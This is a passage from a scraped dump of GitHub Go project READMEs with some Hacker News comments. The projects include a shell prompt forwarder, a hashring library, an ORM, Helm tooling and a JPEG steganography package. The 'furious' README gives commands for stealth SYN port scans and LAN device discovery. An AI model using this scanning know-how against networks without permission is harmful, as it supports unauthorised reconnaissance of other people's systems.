GBT__HOME='/usr/share/gbt'\nsource $GBT__HOME/sources/gbts/cmd/local.sh\n```\n\nThis will automatically create command line aliases for all enabled plugins (by\ndefault `docker`, `gssh`, `kubectl`, `mysql`, `screen`, `ssh`, `su`, `sudo` and\n`vagrant`). Then just SSH to some remote server or enter some Docker container\n(even via `kubectl`) or Vagrant box and you should get GBT prompt there.\n\nIf you want to have some of the default aliase available only on the remote\nsite, just un-alias them locally:\n\n```shell\nunalias sudo su\n```\n\nYou can also forward your own aliases which will be then available on any remote\nsite. For example to have `alias ll='ls -l'` on any remote site, just create the\nfollowing alias and it will be automatically forwarded:\n\n```shell\nalias gbt___ll='ls -l'\n```\n\nThe idea behind prompt forwarding is coming from Vladimir Babichev\n(@[mrdrup](https://github.com/mrdrup)) who was using it for several years\nbefore GBT even existed. After seeing the potential of GBT, he sparked the\nimplementation of prompt forwarding into GBT which later turned into GBTS.\n\n\n### Principle\n\nPrinciple of GBTS is to pass the GBTS scripts to the application and then execute\nthem. This is done by concatting all the GBTS scripts into one file and encoding\nit by Base64 algorithm. Such string, together with few more commands, is then\nused as an argument of the application which makes it to store it on the remote\nsite in the `/tmp/.gbt.` file. The same we create the `/tmp/.gbt..bash`\nscript which is then used as a replacement of the real shell on the remote site.\nFor SSH it would look like this:\n\n```shell\nssh -t myserver \"export GBT__CONF='$GBT__CONF' && echo '' | base64 -d > \\$GBT__CONF && bash --rcfile \\$GBT__CONF\"\n```\n\nIn order to make all this invisible, we wrap that command into a function (e.g.\n`gbt_ssh`) and assign it to an `alias` of the same name like the original\napplication (e.g. `ssh`):\n\n```shell\nalias ssh='gbt_ssh'\n```\n\nThe same or very similar principle applies to other supported commands like\n`docker`, `gssh` ([GCP\nSSH](https://cloud.google.com/sdk/gcloud/reference/compute/ssh)), `kubectl`,\n`mysql`, `screen`, `su`, `sudo` and `vagrant`.\n\n\n### Additional settings\n\nGBTS has few settings which can be used to influence its behaviour. See the\ndetails [here](https://github.com/jtyr/gbt/tree/master/sources/gbts/README.md).\n\n\n### MacOS users\n\nTo make GBTS working correctly between Linux and MacOS and vice versa requires a\nlittle bit of fiddling. The reason is that the basic command line tools like\n`date` and `base64` are very old on MacOS and mostly incompatible with the Linux\nworld. Some tools are even called differently (e.g. `md5sum` is called `md5`).\n\nTherefore if you want to make the remote script verification working (make sure\nnobody changed the remote script while using it), the following variables must be\nset:\n\n```shell\n# Use 'md5' command instead of 'md5sum'\nexport GBT__SOURCE_MD5_LOCAL='md5'\n# Cut the 4th field from the output of 'md5'\nexport GBT__SOURCE_MD5_CUT_LOCAL='4'\n```\n\nIf you don't want to use this feature, you can disable it in which case the above\nvariables won't be required:\n\n```shell\nexport GBT__SOURCE_SEC_DISABLE=1\n```\n\nWhen using the `ExecTime` car, the following variable must be set:\n\n```shell\n# Don't use nanoseconds in the 'ExecTime' car\nexport GBT__SOURCE_DATE_ARG='+%s'\n```\n\nFor maximum compatibility with GBT, it's recommended to install GNU `coreutils`\n(`brew install coreutils`) and instead of the variable above use these:\n\n```shell\n# Use 'gdate' instead of 'date'\nexport GBT__SOURCE_DATE='gdate'\n# Use 'gdate' instead of 'date' (only if you run GBT on a Mac)\nexport GBT__SOURCE_BASE64_LOCAL='gbase64'\n# Use 'gdate' instead of 'date' (only if you are connection to Mac via SSH)\nexport GBT__SOURCE_BASE64='gbase64'\n```\n\nWhen connecting to MacOS from Linux using `gbt_ssh` and not using `gbase64` on\nMacOS, the following variable must be set on Linux to make the Base64 decoding\nworking on MacOS:\n\n```shell\n# Use 'base64 -D' to decode Base64 encoded text\nexport GBT__SOURCE_BASE64_DEC='-D'\n```\n\n\n### Limitations\n\n- Requires Bash v4.x to run.\n- The [color representation](https://bugs.mysql.com/79755) and [support of\n unicode characters](https://bugs.mysql.com/89359) for MySQL is broken in MySQL\n 5.6 and above. But it works just fine in all versions of Percona and MariaDB.\n- Plugins `su` and `sudo` are not supported on MacOS.\n\n\nTODO\n----\n\nContribution to the following is more than welcome:\n\n- Optimize generated escape sequence\n - Don't decorate empty string\n - Don't decorate child element with the same attributes used by the parent\n- Implement templating language to allow more dynamic configuration\n - Jinja2-like syntax\n - Should be able to refer variables from the local car\n - `GBT_CAR_GIT_BG=\"{% 'red' if Status == '{{ StatusDirty }}' else 'light_gray' %}\"`\n - Should be able to refer ENV variables (e.g. `env('HOME')`)\n - Could be able to refer variables from another car\n - Advanced functionality via pipes (e.g. ` | substr(1,3)`)\n- Add support for GBT [plugins](https://golang.org/pkg/plugin/)\n - Load plugins with `GBT_PLUGINS='mycar1:/path/to/mycar1.so;mycar2:/path/to/mycar2.so'`\n - Load the plugin, read the `Car` symbol and assign the reference to the\n `mycar1` in the `carsFactory`\n- Implement Vim statusline using GBT as the generator\n- Implement Tmux statusline using GBT as the generator\n- Add weather car\n - Using Yahoo Weather API\n - Needs to cache the results in a file and refresh only if its timestamp is\n older than certain time. Or perhaps store the last update in env var?\n- Add more themes\n\n\nAuthor\n------\n\nJiri Tyr\n\n\nLicense\n-------\n\nMIT\n", "readme_type": "markdown", "hn_comments": "The map is really, really hard to zoom in and out.239,989,522 wifi networks: https://wigle.netI'd love to see this adjusted for population density -- what does a high wifi hotspots/person tell you?Maybe just that the area is wealthier. So what if you adjust for wealth too?Not seeing McDonald's. There's another 35,000 for you.Impressive bit of work but I couldn't help but think the title should be:Show HN: 500,000 free places to get hacked plotted around the worldHmmm I get the feeling that one of your 'sources' for the db comes from the users who have already installed your app. Just a tin-foil-hat hunch based on the density of nodes in certain areas (read: certain routes). Too bad 60%+ are HP-Printers or vmguests...either way it'd pay to clean all that up if you're promoting that they're free/open hotspots.What is the source of this data?\nAs I see my tier 3 city also has few free wifi listed here.Nice work! This reminds me to something I tried a while ago:https://wiffinity.comThey basically provide the same thing but as a crowdsourced list of truly free hotspots and you can connect to them through the app. Only available as a native app though...Is it really free if you're using a hotspot named NETGEAR? Because I'm assuming that one isn't really open on purpose.EDIT: Removed part about trailer court. I was wrong. That's actually a restaurant next to a trailer court. Nice place, too.Not all of these Wifi APs are \"Free\" and its partial in a lot of spots. Still, good effort.very good site!How do I zoom out?Any theories on why China has a notably less dense distribution?I've had two open ones for years that didn't make the map :(.https://location.services.mozilla.com/A point of constructive criticism is that there are some inconsistencies in how large-scale public WiFi seems to be handled. For instance, in Ann Arbor, MI every University of Michigan building AFAIK has free public WiFi (as well as a private network for university affiliates). However, I only see a few listings for the \"MGuest\" network in the area. Is there a better feasible way of handling this?This is not mapping free WiFi hotspots.\nThis is mapping open Wifi hotspots.They are not the same.For example, KPN in the Netherlands is not free, and xfinity wifi in the USA is not free.For this to have any sort of credibility, there needs to be a discriminant filter mapping truly free vs open hotspots.For me this current map is too noisy to be of value. Try using it for free internet, and you too may run into disillusionment and frustration.Looks really great - love the web view of WiFi density, and great to see more efforts in this space.We've built something similar at OpenSignal. Our WifiMapper [1] app on iOS and Android has a database of over 2 million networks, and we're also crowdsourcing a database of passwords and connection speeds.[1] https://www.wifimapper.com/Nice to see a Starbucks hotspot in the middle of Thames river (London)... doesn't show the depth ;)This isn't working for me, after I zoom in past a certain level, all the blue dots just disappear. Clicking a city name search result zooms in so far that the map goes blank (presumably it's past the available tile sets) Tested in Safari and ChromeIf an WiFi hotspot doesn't have a password doesn't mean it's free.Are those providing internet access, or just unprotected networks ?I'm always glad to see maps using OpenStreetMap data over Google Maps.I always find it fun to look over the edits I've made, and it helps point out where more detail would be useful for different use cases.Searching by zip code zooms the map into areas 20-40 miles outside of the actual area code. At least that was my experience with the 2 that I tried.In case anyone can't find the Netherlands, I could understand why: http://i.snag.gy/7vbiZ.jpgThis also explains why I'm so frustrated with WiFi abroad: I probably got spoiled here. Here we can find WiFi in the most unlikely of places (e.g. supermarkets, buses); in Germany you can find one in a coffee shop if you're lucky, but that one is probably paid as well, just like all the other ones.Bad data set. You are missing most of the free wifi spots in my town, but do show a number of people who just haven't secured their routers.Wrong question.I don't care where I can find free WiFi. Nowadays, every damn coffee shop, hotel or mall has free Wifi\u2014I care about fast and free WiFi with speedy up- & downloads and low latency. Well executed implementation though.EDIT: Why the downvote?I am redirected to https://meshable.io/map which is a blank page. I even disabled uBlock and refreshed the page and still saw nothing.All I can see if a hand for a cursor, and my right click button is disabled to even check on the source.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "serialx/hashring", "link": "https://github.com/serialx/hashring", "tags": [], "stars": 524, "description": "Consistent hashing \"hashring\" implementation in golang (using the same algorithm as libketama)", "lang": "Go", "repo_lang": "", "readme": "hashring\n============================\n\nImplements consistent hashing that can be used when\nthe number of server nodes can increase or decrease (like in memcached).\nThe hashing ring is built using the same algorithm as libketama.\n\nThis is a port of Python hash_ring library \nin Go with the extra methods to add and remove nodes.\n\n\nUsing\n============================\n\nImporting ::\n\n```go\nimport \"github.com/serialx/hashring\"\n```\n\nBasic example usage ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nTo fulfill replication requirements, you can also get a list of servers that should store your key.\n```go\nserversInRing := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.248:11212\",\n \"192.168.0.249:11212\",\n \"192.168.0.250:11212\",\n \"192.168.0.251:11212\",\n \"192.168.0.252:11212\"}\n\nreplicaCount := 3\nring := hashring.New(serversInRing)\nserver, _ := ring.GetNodes(\"my_key\", replicaCount)\n```\n\nUsing weights example ::\n\n```go\nweights := make(map[string]int)\nweights[\"192.168.0.246:11212\"] = 1\nweights[\"192.168.0.247:11212\"] = 2\nweights[\"192.168.0.249:11212\"] = 1\n\nring := hashring.NewWithWeights(weights)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nAdding and removing nodes example ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nring = ring.RemoveNode(\"192.168.0.246:11212\")\nring = ring.AddNode(\"192.168.0.250:11212\")\nserver, _ := ring.GetNode(\"my_key\")\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liamg/furious", "link": "https://github.com/liamg/furious", "tags": ["port-scanner", "ip-scanner", "network-scanner", "security"], "stars": 524, "description": ":angry: Go IP/port scanner with SYN (stealth) scanning and device manufacturer identification", "lang": "Go", "repo_lang": "", "readme": "# Furious IP/Port Scanner\n\nFurious is a fast, lightweight, portable network scanner.\n\n![Screenshot 1](./screenshot.png)\n![Screenshot 2](./screenshot2.png)\n\nI haven't done any proper performance testing, but a SYN scan of a single host, including all known ports (~6000) will typically take in the region of 4 seconds. On the same machine, nmap took 98 seconds and produced exactly the same results.\n\n## Install\n\nYou'll need to install libpcap.\n\n- On Linux, install `libpcap` with your package manager\n- On OSX, `brew install libpcap`\n- On Windows, install [WinPcap](https://www.winpcap.org/)\n\nThen just:\n\n```\ngo get -u github.com/liamg/furious\n```\n\n## Options\n\n### `-s [TYPE]` `--scan-type [TYPE]`\n\nUse the specified scan type. The options are:\n\n| Type | Description |\n|------------|-------------|\n| `syn` | A SYN/stealth scan. Most efficient scan type, using only a partial TCP handshake. Requires root privileges.\n| `connect` | A less detailed scan using full TCP handshakes, though does not require root privileges. \n| `device` | Attempt to identify device MAC address and manufacturer where possible. Useful for listing devices on a LAN.\n\nThe default is a SYN scan.\n\n### `-p [PORTS]` `--ports [PORTS]`\n\nScan the specified ports. Defaults to a list of all known ports as [provided by IANA](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml).\n\nPorts may be specified using a comma delimited list, and ranges are also allowed.\n\nFor example:\n\n```\n--ports 22,80,443,8080-8082\n```\n\n...will scan 22, 80, 443, 8080, 8081, and 8082.\n\n### `-t [MS]` `--timout-ms [MS]`\n\nThe network timeout to apply to each port being checked. Default is *1000ms*.\n\n### `-w [COUNT]` `--workers [COUNT]`\n\nThe number of worker routines to use to scan ports in parallel. Default is *1000* workers.\n\n### `-u` `--up-only`\n\nOnly show output for hosts that are confirmed as up.\n\n### `--version`\n\nOutput version information and exit.\n\n## Usage\n\nFurious can be used to:\n\n### Find open ports on one or more hosts\n\nScan a single host:\n```\nfurious 192.168.1.4 \n```\n\nScan a whole CIDR:\n```\nfurious 192.168.1.0/24 \n```\n\n### Scan a mixture of IPs, hostnames and CIDRs\n\n```\nfurious -s connect 8.8.8.8 192.168.1.1/24 google.com\n```\n\n### Run a SYN (stealth) scan (with root privileges)\n\n```\nsudo -E furious -s syn 192.168.1.1\n```\n\n### Run a connect scan as any user\n\n```\nfurious -s connect 192.168.1.1\n```\n\n### Identify device MAC address and manufacturer within a local network\n\n```\nfurious -s device 192.168.1.1/24 -u\n```\n\n## Troubleshooting\n\n### `sudo: furious: command not found`\n\nIf you installed using go, your user has the environment variables required to locate go programs, but root does not. You need to:\n\n```\nsudo env \"PATH=$PATH\" furious\n```\n\n## SYN/Connect scans are slower than nmap!\n\nThey're not in my experience, but with default arguments furious scans nearly six times as many ports as nmap does by default.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jonmorehouse/terraform-provisioner-ansible", "link": "https://github.com/jonmorehouse/terraform-provisioner-ansible", "tags": [], "stars": 524, "description": "A provisioner for bootstrapping terraform resources with ansible", "lang": "Go", "repo_lang": "", "readme": "# terraform-provisioner-ansible\n> Provision terraform resources with ansible\n\n## Overview\n\n**[Terraform](https://github.com/hashicorp/terraform)** is a tool for automating infrastructure. Terraform includes the ability to provision resources at creation time through a plugin api. Currently, some builtin [provisioners](https://www.terraform.io/docs/provisioners/) such as **chef** and standard scripts are provided; this provisioner introduces the ability to provision an instance at creation time with **ansible**.\n\nThis provisioner provides the ability to apply **host-groups**, **plays** or **roles** against a host at provision time. Ansible is run on the host itself and this provisioner configures a dynamic inventory on the fly as resources are created.\n\n**terraform-provisioner-ansible** is shipped as a **Terraform** [module](https://www.terraform.io/docs/modules/create.html). To include it, simply download the binary and enable it as a terraform module in your **terraformrc**.\n\n## Installation\n\n**terraform-provisioner-ansible** ships as a single binary and is compatible with **terraform**'s plugin interface. Behind the scenes, terraform plugins use https://github.com/hashicorp/go-plugin and communicate with the parent terraform process via RPC.\n\nTo install, download and un-archive the binary and place it on your path.\n\n```bash\n$ https://github.com/jonmorehouse/terraform-provisioner-ansible/releases/download/0.0.1-terraform-provisioner-ansible.tar.gz\n\n$ tar -xvf 0.0.1-terraform-provisioner-ansible.tar.gz /usr/local/bin\n```\n\nOnce installed, a `~/.terraformrc` file is used to _enable_ the plugin.\n\n```bash\nproviders {\n ansible = \"/usr/local/bin/terraform-provisioner-ansible\"\n}\n```\n\n## Usage\n\nOnce installed, you can provision resources by including an `ansible` provisioner block.\n\nThe following example demonstrates a configuration block to apply a host group's plays to new instances. You can specify a list of hostgroups and a list of plays to specify which ansible tasks to perform on the host.\n\nAdditionally, `groups` and `extra_vars` are accessible to resolve variables and group the new host in ansible.\n\n```\n{\n resource \"aws_instance\" \"terraform-provisioner-ansible-example\" {\n ami = \"ami-408c7f28\"\n instance_type = \"t1.micro\"\n\n provisioner \"ansible\" {\n connection {\n user = \"ubuntu\"\n }\n\n playbook = \"ansible/playbook.yml\"\n groups = [\"all\"]\n hosts = [\"terraform\"]\n extra_vars = {\n \"env\": \"terraform\" \n }\n }\n }\n}\n```\n\nCheck out [example](example/) for a more detailed walkthrough of the provisioner and how to provision resources with **ansible**.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "slicebit/qb", "link": "https://github.com/slicebit/qb", "tags": ["golang", "go", "database", "db", "orm", "sql", "sqlite3", "sqlalchemy", "postgresql", "mysql"], "stars": 523, "description": "The database toolkit for go", "lang": "Go", "repo_lang": "", "readme": "![alt text](https://github.com/slicebit/qb/raw/master/qb_logo_128.png \"qb: the database toolkit for go\")\n\n# qb - the database toolkit for go\n\n[![Build Status](https://travis-ci.org/slicebit/qb.svg?branch=master)](https://travis-ci.org/slicebit/qb)\n[![Coverage Status](https://coveralls.io/repos/github/slicebit/qb/badge.svg?branch=master)](https://coveralls.io/github/slicebit/qb?branch=master)\n[![License (LGPL version 2.1)](https://img.shields.io/badge/license-GNU%20LGPL%20version%202.1-brightgreen.svg?style=flat)](http://opensource.org/licenses/LGPL-2.1)\n[![Go Report Card](https://goreportcard.com/badge/github.com/slicebit/qb)](https://goreportcard.com/report/github.com/slicebit/qb)\n[![GoDoc](https://godoc.org/github.com/golang/gddo?status.svg)](http://godoc.org/github.com/slicebit/qb)\n\n**This project is currently pre 1.**\n\nCurrently, it's not feature complete. It can have potential bugs. There are no tests covering concurrency race conditions. It can crash especially in concurrency.\nBefore 1.x releases, each major release could break backwards compatibility.\n\nAbout qb\n--------\nqb is a database toolkit for easier db queries in go. It is inspired from python's best orm, namely sqlalchemy. qb is an orm(sqlx) as well as a query builder. It is quite modular in case of using just expression api and query building stuff.\n\n[Documentation](https://qb.readme.io)\n-------------\nThe documentation is hosted in [readme.io](https://qb.readme.io) which has great support for markdown docs. Currently, the docs are about 80% - 90% complete. The doc files will be added to this repo soon. Moreover, you can check the godoc from [here](https://godoc.org/github.com/slicebit/qb). Contributions & Feedbacks in docs are welcome.\n\nFeatures\n--------\n- Support for postgres(9.5.+), mysql & sqlite3\n- Powerful expression API for building queries & table ddls\n- Struct to table ddl mapper where initial table migrations can happen\n- Transactional session api that auto map structs to queries\n- Foreign key definitions\n- Single & Composite column indices\n- Relationships (soon.. probably in 0.3 milestone)\n\nInstallation\n------------\n```sh\ngo get -u github.com/slicebit/qb\n```\nIf you want to install test dependencies then;\n```sh\ngo get -u -t github.com/slicebit/qb\n```\n\nQuick Start\n-----------\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/slicebit/qb\"\n\t_ \"github.com/mattn/go-sqlite3\"\n _ \"github.com/slicebit/qb/dialects/sqlite\"\n)\n\ntype User struct {\n\tID string `db:\"id\"`\n\tEmail string `db:\"email\"`\n\tFullName string `db:\"full_name\"`\n\tOscars int `db:\"oscars\"`\n}\n\nfunc main() {\n\n\tusers := qb.Table(\n\t\t\"users\",\n\t\tqb.Column(\"id\", qb.Varchar().Size(40)),\n\t\tqb.Column(\"email\", qb.Varchar()).NotNull().Unique(),\n\t\tqb.Column(\"full_name\", qb.Varchar()).NotNull(),\n\t\tqb.Column(\"oscars\", qb.Int()).NotNull().Default(0),\n\t\tqb.PrimaryKey(\"id\"),\n\t)\n\n\tdb, err := qb.New(\"sqlite3\", \"./qb_test.db\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tdefer db.Close()\n\n\tmetadata := qb.MetaData()\n\n\t// add table to metadata\n\tmetadata.AddTable(users)\n\n\t// create all tables registered to metadata\n\tmetadata.CreateAll(db)\n\tdefer metadata.DropAll(db) // drops all tables\n\n\tins := qb.Insert(users).Values(map[string]interface{}{\n\t\t\"id\": \"b6f8bfe3-a830-441a-a097-1777e6bfae95\",\n\t\t\"email\": \"jack@nicholson.com\",\n\t\t\"full_name\": \"Jack Nicholson\",\n\t})\n\n\t_, err = db.Exec(ins)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// find user\n\tvar user User\n\n\tsel := qb.Select(users.C(\"id\"), users.C(\"email\"), users.C(\"full_name\")).\n\t\tFrom(users).\n\t\tWhere(users.C(\"id\").Eq(\"b6f8bfe3-a830-441a-a097-1777e6bfae95\"))\n\n\terr = db.Get(sel, &user)\n\tfmt.Printf(\"%+v\\n\", user)\n}\n```\n\nCredits\n-------\n- [Aras Can Ak\u0131n](https://github.com/aacanakin)\n- [Christophe de Vienne](https://github.com/cdevienne)\n- [Onur \u015eent\u00fcre](https://github.com/onursenture)\n- [Aaron O. Ellis](https://github.com/aodin)\n- [Shawn Smith](https://github.com/shawnps)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lukechampine/jsteg", "link": "https://github.com/lukechampine/jsteg", "tags": ["steganography", "jpeg"], "stars": 523, "description": "JPEG steganography", "lang": "Go", "repo_lang": "", "readme": "jsteg\n-----\n\n[![GoDoc](https://godoc.org/lukechampine.com/jsteg?status.svg)](https://godoc.org/lukechampine.com/jsteg)\n[![Go Report Card](http://goreportcard.com/badge/lukechampine.com/jsteg)](https://goreportcard.com/report/lukechampine.com/jsteg)\n\n```\ngo get lukechampine.com/jsteg\n```\n\n`jsteg` is a package for hiding data inside jpeg files, a technique known as\n[steganography](https://en.wikipedia.org/wiki/steganography). This is accomplished\nby copying each bit of the data into the least-significant bits of the image.\nThe amount of data that can be hidden depends on the filesize of the jpeg; it\ntakes about 10-14 bytes of jpeg to store each byte of the hidden data.\n\n## Example\n\n```go\n// open an existing jpeg\nf, _ := os.Open(filename)\nimg, _ := jpeg.Decode(f)\n\n// add hidden data to it\nout, _ := os.Create(outfilename)\ndata := []byte(\"my secret data\")\njsteg.Hide(out, img, data, nil)\n\n// read hidden data:\nhidden, _ := jsteg.Reveal(out)\n```\n\nNote that the data is not demarcated in any way; the caller is responsible for\ndetermining which bytes of `hidden` it cares about. The easiest way to do this\nis to prepend the data with its length.\n\nA `jsteg` command is included, providing a simple wrapper around the\nfunctions of this package. It can hide and reveal data in jpeg files and\nsupports input/output redirection. It automatically handles length prefixes\nand uses a magic header to identify jpegs that were produced by `jsteg`.\n\nA more narrowly-focused command named `slink` is also included. `slink` embeds\na public key in a jpeg, and makes it easy to sign data and verify signatures\nusing keypairs derived from password strings. See [cmd/slink](cmd/slink) for a\nfull description.\n\nBinaries for both commands can be found [here](https://github.com/lukechampine/jsteg/releases).\n\n---\n\nThis package reuses a significant amount of code from the image/jpeg package.\nThe BSD-style license that governs the use of that code can be found in the\n`go_LICENSE` file.\n", "readme_type": "markdown", "hn_comments": "More about the JSTEG algorithm:\nhttps://pdfs.semanticscholar.org/8893/ba76f2e358e80ef5bd93e4...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "helm/chart-releaser", "link": "https://github.com/helm/chart-releaser", "tags": ["helm", "charts", "kubernetes", "repository", "hosting"], "stars": 523, "description": "Hosting Helm Charts via GitHub Pages and Releases", "lang": "Go", "repo_lang": "", "readme": "# Chart Releaser\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n![CI](https://github.com/helm/chart-releaser/workflows/CI/badge.svg?branch=main&event=push)\n\n**Helps Turn GitHub Repositories into Helm Chart Repositories**\n\n`cr` is a tool designed to help GitHub repos self-host their own chart repos by adding Helm chart artifacts to GitHub Releases named for the chart version and then creating an `index.yaml` file for those releases that can be hosted on GitHub Pages (or elsewhere!).\n\n## Installation\n\n### Binaries (recommended)\n\nDownload your preferred asset from the [releases page](https://github.com/helm/chart-releaser/releases) and install manually.\n\n### Homebrew\n\n```console\n$ brew tap helm/tap\n$ brew install chart-releaser\n```\n\n### Go get (for contributing)\n\n```console\n$ # clone repo to some directory outside GOPATH\n$ git clone https://github.com/helm/chart-releaser\n$ cd chart-releaser\n$ go mod download\n$ go install ./...\n```\n\n### Docker (for Continuous Integration)\n\nDocker images are pushed to the [helmpack/chart-releaser](https://quay.io/repository/helmpack/chart-releaser?tab=tags) Quay container registry. The Docker image is built on top of Alpine and its default entry-point is `cr`. See the [Dockerfile](./Dockerfile) for more details.\n\n## Usage\n\nCurrently, `cr` can create GitHub Releases from a set of charts packaged up into a directory and create an `index.yaml` file for the chart repository from GitHub Releases.\n\n```console\n$ cr --help\nCreate Helm chart repositories on GitHub Pages by uploading Chart packages\nand Chart metadata to GitHub Releases and creating a suitable index file\n\nUsage:\n cr [command]\n\nAvailable Commands:\n completion generate the autocompletion script for the specified shell\n help Help about any command\n index Update Helm repo index.yaml for the given GitHub repo\n package Package Helm charts\n upload Upload Helm chart packages to GitHub Releases\n version Print version information\n\nFlags:\n --config string Config file (default is $HOME/.cr.yaml)\n -h, --help help for cr\n\nUse \"cr [command] --help\" for more information about a command.\n```\n\n### Create GitHub Releases from Helm Chart Packages\n\nScans a path for Helm chart packages and creates releases in the specified GitHub repo uploading the packages.\n\n```console\n$ cr upload --help\nUpload Helm chart packages to GitHub Releases\n\nUsage:\n cr upload [flags]\n\nFlags:\n -c, --commit string Target commit for release\n --generate-release-notes Whether to automatically generate the name and body for this release. See https://docs.github.com/en/rest/releases/releases\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for upload\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --release-notes-file string Markdown file with chart release notes. If it is set to empty string, or the file is not found, the chart description will be used instead. The file is read from the chart package\n --skip-existing Skip upload if release exists\n -t, --token string GitHub Auth Token\n --make-release-latest bool Mark the created GitHub release as 'latest' (default \"true\")\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n### Create the Repository Index from GitHub Releases\n\nOnce uploaded you can create an `index.yaml` file that can be hosted on GitHub Pages (or elsewhere).\n\n```console\n$ cr index --help\nUpdate a Helm chart repository index.yaml file based on a the\ngiven GitHub repository's releases.\n\nUsage:\n cr index [flags]\n\nFlags:\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for index\n -i, --index-path string Path to index file (default \".cr-index/index.yaml\")\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --pages-branch string The GitHub pages branch (default \"gh-pages\")\n --pages-index-path string The GitHub pages index path (default \"index.yaml\")\n --pr Create a pull request for index.yaml against the GitHub Pages branch (must not be set if --push is set)\n --push Push index.yaml to the GitHub Pages branch (must not be set if --pr is set)\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --remote string The Git remote used when creating a local worktree for the GitHub Pages branch (default \"origin\")\n -t, --token string GitHub Auth Token (only needed for private repos)\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n## Configuration\n\n`cr` is a command-line application.\nAll command-line flags can also be set via environment variables or config file.\nEnvironment variables must be prefixed with `CR_`.\nUnderscores must be used instead of hyphens.\n\nCLI flags, environment variables, and a config file can be mixed.\nThe following order of precedence applies:\n\n1. CLI flags\n1. Environment variables\n1. Config file\n\n### Examples\n\nThe following example show various ways of configuring the same thing:\n\n#### CLI\n\n cr upload --owner myaccount --git-repo helm-charts --package-path .deploy --token 123456789\n\n#### Environment Variables\n\n export CR_OWNER=myaccount\n export CR_GIT_REPO=helm-charts\n export CR_PACKAGE_PATH=.deploy\n export CR_TOKEN=\"123456789\"\n export CR_GIT_BASE_URL=\"https://api.github.com/\"\n export CR_GIT_UPLOAD_URL=\"https://uploads.github.com/\"\n export CR_SKIP_EXISTING=true\n\n cr upload\n\n#### Config File\n\n`config.yaml`:\n\n```yaml\nowner: myaccount\ngit-repo: helm-charts\npackage-path: .deploy\ntoken: 123456789\ngit-base-url: https://api.github.com/\ngit-upload-url: https://uploads.github.com/\n```\n\n#### Config Usage\n\n cr upload --config config.yaml\n\n\n`cr` supports any format [Viper](https://github.com/spf13/viper) can read, i. e. JSON, TOML, YAML, HCL, and Java properties files.\n\nNotice that if no config file is specified, `cr.yaml` (or any of the supported formats) is loaded from the current directory, `$HOME/.cr`, or `/etc/cr`, in that order, if found.\n\n#### Notes for Github Enterprise Users\n\nFor Github Enterprise, `chart-releaser` users need to set `git-base-url` and `git-upload-url` correctly, but the correct values are not always obvious to endusers.\n\nBy default they are often along these lines:\n\n```\nhttps://ghe.example.com/api/v3/\nhttps://ghe.example.com/api/uploads/\n```\n\nIf you are trying to figure out what your `upload_url` is try to use a curl command like this:\n`curl -u username:token https://example.com/api/v3/repos/org/repo/releases`\nand then look for `upload_url`. You need the part of the URL that appears before `repos/` in the path.\n\n##### Known Bug\n\nCurrently, if you set the upload URL incorrectly, let's say to something like `https://example.com/uploads/`, then `cr upload` will appear to work, but the release will not be complete. When everything is working there should be 3 assets in each release, but instead there will only be the 2 source code assets. The third asset, which is what helm actually uses, is missing. This issue will become apparent when you run `cr index` and it always claims that nothing has changed, because it can't find the asset it expects for the release.\n\nIt appears like the [go-github Do call](https://github.com/google/go-github/blob/master/github/github.go#L520) does not catch the fact that the upload URL is incorrect and pass back the expected error. If the asset upload fails, it would be better if the release was rolled back (deleted) and an appropriate log message is be displayed to the user.\n\nThe `cr index` command should also generate a warning when a release has no assets attached to it, to help people detect and troubleshoot this type of problem.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kellegous/go", "link": "https://github.com/kellegous/go", "tags": [], "stars": 522, "description": "Another Google-like Go short link service", "lang": "Go", "repo_lang": "", "readme": "# A \"go\" short-link service\n\n## Background\nThe first time I encountered \"go\" links was at Google. Anyone on the corporate\nnetwork could register a URL shortcut and it would redirect the user to the\nappropriate page. So for instance, if you wanted to find out more about BigTable,\nyou simply directed your browser at http://go/bigtable and you would be redirected to\nsomething about the BigTable data storage system. I was later told that the\nfirst go service at Google was written by [Benjamin 